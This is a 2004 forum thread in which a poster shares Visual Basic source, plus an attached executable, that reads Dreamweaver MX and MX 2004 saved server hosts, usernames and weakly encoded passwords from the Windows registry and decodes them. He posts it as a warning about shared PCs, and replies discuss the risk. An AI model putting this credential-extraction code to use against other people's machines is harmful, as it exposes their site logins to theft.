for people who use DW MX or DW MX 2004

**Acidic** · Apr 27th, 2004, 04:12 PM

If you use this software you'll know that it can store the server login and password so that it can upload files at the click of a button. Well, macromedia didn't bother with much encryption of the password. I've attached the .exe which will tell you your passwords. And here's the source code for you who don't trust me:

VB Code:

Private Sub Command1_Click()
MsgBox get_pass(GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Common\2004\Sites\-Site0", "User PW"))
End Sub
 
Private Function get_pass(password)
Dim chars_in_disguise() As String
Dim i As Byte
Dim j As Byte
 
ReDim chars_in_disguise(Len(password) / 2)
j = 1
For i = 0 To UBound(chars_in_disguise) - 1
    chars_in_disguise(i) = Mid(password, j, 2)
    j = j + 2
Next i
 
j = 0
For i = 0 To UBound(chars_in_disguise) - 1
    chars_in_disguise(i) = chars_in_disguise(i)
    chars_in_disguise(i) = CLng("&H" & chars_in_disguise(i))
    chars_in_disguise(i) = Chr(chars_in_disguise(i) - j)
    j = j + 1
Next i
get_pass = Join(chars_in_disguise(), "")
End Function
 
Private Sub Form_Load()
Dim i As Byte
Dim str As String
'DW MX 2004
i = 0
While Len(GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Common\2004\Sites\-Site" & i, "User PW")) > 0
    str = GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Common\2004\Sites\-Site" & i, "Host")
    str = str & " - " & GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Common\2004\Sites\-Site" & i, "User")
    str = str & " - " & get_pass(GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Common\2004\Sites\-Site" & i, "User PW"))
    List1.AddItem str
    i = i + 1
Wend
 
'DW MX
i = 0
While Len(GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Dreamweaver 6\Sites\-Site" & i, "User PW")) > 0
    str = GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Dreamweaver 6\Sites\-Site" & i, "Host")
    str = str & " - " & GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Dreamweaver 6\Sites\-Site" & i, "User")
    str = str & " - " & get_pass(GetSettingString(HKEY_USERS, "S-1-5-21-1275210071-492894223-682003330-1003\Software\Macromedia\Dreamweaver 6\Sites\-Site" & i, "User PW"))
    List1.AddItem str
    i = i + 1
Wend
End Sub

and the registry.bas file:

VB Code:

'Thanks to KayJay for this (from codebank)
Option Explicit
 
Public Const HKEY_CLASSES_ROOT = &H80000000
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_PERFORMANCE_DATA = &H80000004
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const REG_SZ = 1                         ' Unicode nul terminated string
Public Const REG_BINARY = 3                     ' Free form binary
Public Const REG_DWORD = 4                      ' 32-bit number
Public Const ERROR_SUCCESS = 0&
 
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
 
 
Public Function GetSettingString(hKey As Long, strPath As String, strValue As String, Optional Default As String) As String
Dim hCurKey As Long
Dim lValueType As Long
Dim strBuffer As String
Dim lDataBufferSize As Long
Dim intZeroPos As Integer
Dim lRegResult As Long
 
' Set up default value
If Not IsEmpty(Default) Then
  GetSettingString = Default
Else
  GetSettingString = ""
End If
 
' Open the key and get length of string
lRegResult = RegOpenKey(hKey, strPath, hCurKey)
lRegResult = RegQueryValueEx(hCurKey, strValue, 0&, lValueType, ByVal 0&, lDataBufferSize)
 
If lRegResult = ERROR_SUCCESS Then
 
  If lValueType = REG_SZ Then
    ' initialise string buffer and retrieve string
    strBuffer = String(lDataBufferSize, " ")
    lRegResult = RegQueryValueEx(hCurKey, strValue, 0&, 0&, ByVal strBuffer, lDataBufferSize)
    
    ' format string
    intZeroPos = InStr(strBuffer, Chr$(0))
    If intZeroPos > 0 Then
      GetSettingString = Left$(strBuffer, intZeroPos - 1)
    Else
      GetSettingString = strBuffer
    End If
 
  End If
 
Else
  ' there is a problem
End If
 
lRegResult = RegCloseKey(hCurKey)
End Function

conclusion, don't manage your site in DW on a public PC.

**Acidic** · Apr 27th, 2004, 04:13 PM

forgot the attchement, here it is.

**Arc** · Apr 27th, 2004, 07:28 PM

I use DW every day and have never had a problem

**CornedBee** · Apr 28th, 2004, 03:50 AM

If there's too much encryption DW itself can't decrypt it, unless the decryption requires a password, and that kind defeats the purpose of storing passwords, doesn't it?

Bottom line: Not DW's fault. Just don't let a public PC ever save your passwords.

**Acidic** · Apr 28th, 2004, 10:25 AM

Originally posted by Arc
I use DW every day and have never had a problem

I'm not saying that there is a problem. Justy a risk. Try running the app. I've never tried it on any PCs other than my own, so it might not actually work.

If it works, then you know not to use DW on the same PC as someone who could use this or similair code to get the password.

and CB, yeah, I suppose it's not their fault. But stil worth knowing.

Thread: for people who use DW MX or DW MX 2004

Thread Tools

Display

for people who use DW MX or DW MX 2004

Posting Permissions